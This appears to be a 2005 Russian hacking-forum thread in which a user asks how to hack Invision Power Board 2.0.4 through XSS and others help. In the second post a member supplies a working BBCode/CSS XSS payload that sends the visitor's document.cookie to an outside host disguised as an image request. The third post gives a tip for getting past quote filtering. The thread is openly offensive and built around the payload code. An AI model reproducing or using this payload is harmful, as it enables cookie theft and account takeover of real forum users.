HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Взлом IBP 2.0.4 через Xss
  #1  
Старый 29.11.2005, 20:20
Astro
Познающий
Регистрация: 29.07.2005
Сообщений: 35
С нами: 10938470

Репутация: 3
По умолчанию Взлом IBP 2.0.4 через Xss

Решил тут попробывать впервые свои силы для взлома 2.0.4. Читав статью на вашем сайте я ломанул 2.0.0. Trial, но 2.0.4. вызвало проблему. В общем просмотрев форум я через определенное время в начале решил внедрит простой скрипт для теста. Вот он:
Код HTML:
[post=1000[topic=wj style=background:url(javascript:alert("test") ); [/topic]]
[/post]
В итоге получилось что, код в посте не отображаеться, но скрипт не запускаеться.
Кто может подскажите что да как, где ошибка и если есть подкиньте какие нибудь статьи.
 

  #2  
Старый 29.11.2005, 20:31
1251soldier
Познающий
Регистрация: 13.10.2005
Сообщений: 78
С нами: 10828602

Репутация: 30
По умолчанию

Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Vot i vsyo ))) avtor - wj )))

Последний раз редактировалось 1251soldier; 29.11.2005 в 20:33..
 

  #3  
Старый 29.11.2005, 21:17
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию

Цитата:
[post=1000[topic=wj style=background:url(javascript:alert("test") ); [/topic]]
[/post]
я точно не уверен но помойму форум блокирует " точнее заменяет на &quot
оставь просто :alert()
 

  #4  
Старый 29.11.2005, 21:29
Astro
Познающий
Регистрация: 29.07.2005
Сообщений: 35
С нами: 10938470

Репутация: 3
По умолчанию

Спасибо всем.
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4 Ice_Fro$T Уязвимости CMS / форумов 19 18.11.2006 09:19
Взлом форумов IPB версии < 2.0.4 Ice_Fro$T Уязвимости CMS / форумов 16 29.12.2005 12:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.